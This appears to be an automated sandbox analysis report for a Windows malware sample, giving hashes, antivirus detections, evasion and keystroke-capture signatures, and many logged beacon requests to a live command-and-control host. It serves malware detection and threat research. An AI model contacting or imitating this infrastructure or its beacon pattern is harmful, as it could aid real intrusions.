Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report WVbU1Gf5p8

Overview

General Information

Sample Name:WVbU1Gf5p8 (renamed file extension from none to exe)
Analysis ID:338142
MD5:69f7cde70cc22aceb5dd32ff1dc3f685
SHA1:f87ee3079aaa5230e107ff9684e7cdea2162caf6
SHA256:625f63364312cec78a4c91abedba868d551d79185ff73e388f561017b13347f0

Most interesting Screenshot:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Submitted sample is a known malware sample
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • WVbU1Gf5p8.exe (PID: 6344 cmdline: 'C:\Users\user\Desktop\WVbU1Gf5p8.exe' MD5: 69F7CDE70CC22ACEB5DD32FF1DC3F685)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: WVbU1Gf5p8.exeAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: WVbU1Gf5p8.exeVirustotal: Detection: 71%Perma Link
Source: WVbU1Gf5p8.exeReversingLabs: Detection: 66%
Machine Learning detection for sampleShow sources
Source: WVbU1Gf5p8.exeJoe Sandbox ML: detected
Source: WVbU1Gf5p8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: WVbU1Gf5p8.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_012385AB FindFirstFileExA,
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
